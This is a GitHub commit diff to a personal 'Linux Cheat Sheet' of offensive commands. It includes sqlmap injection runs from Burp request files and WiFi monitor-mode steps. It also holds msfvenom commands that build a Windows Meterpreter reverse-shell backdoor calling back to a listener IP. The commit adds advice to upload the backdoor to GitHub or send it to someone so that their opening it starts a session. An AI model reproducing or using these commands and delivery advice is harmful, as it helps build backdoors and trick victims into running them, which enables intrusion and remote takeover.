Skip to content

Commit d8d56bb

Browse files
Update Linux Cheat Sheet
1 parent d3450bc commit d8d56bb

File tree

1 file changed

+3
-2
lines changed

1 file changed

+3
-2
lines changed

Linux Cheat Sheet

Lines changed: 3 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -35,7 +35,7 @@ sqlmap -r login.req --batch --force-ssl
3535
-'search.req = info from search bar results using BurpSuite Repeater using 'Copy to File'
3636
-'login.req = info from login screen using results from BurpSuite Repeater using 'Copy to File'
3737
===========================================================================================================================
38-
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.239 -f exe -o payload.exe
38+
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.141 -f exe -o payload.exe
3939
===========================================================================================================================
4040
How to set a WiFi adapter in Monitor Mode:
4141
ifconfig wlan0 down
@@ -65,13 +65,14 @@ msf exploit(handler) > exploit
6565
[*] Starting the payload handler…
6666
===========================================================================================================================
6767
Creating an executable backdoor with Metasploit:
68-
# msfpayload windows/meterpreter/reverse_tcp lhost=<Listening_IP> lport=<Listening_Port> x > backdoor.exe
6968
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.239 -f exe -o payload.exe
7069

7170
LHOST= Your IP
7271
RHOST= Target IP
7372

7473
The backdoor.exe file is saved in the path where you executed the command.
74+
75+
Upload this file to GitHub or send it to someone, once they open it, your meterpreter session will start
7576
===========================================================================================================================
7677

7778
Wireshark Filters:

0 commit comments

Comments
 (0)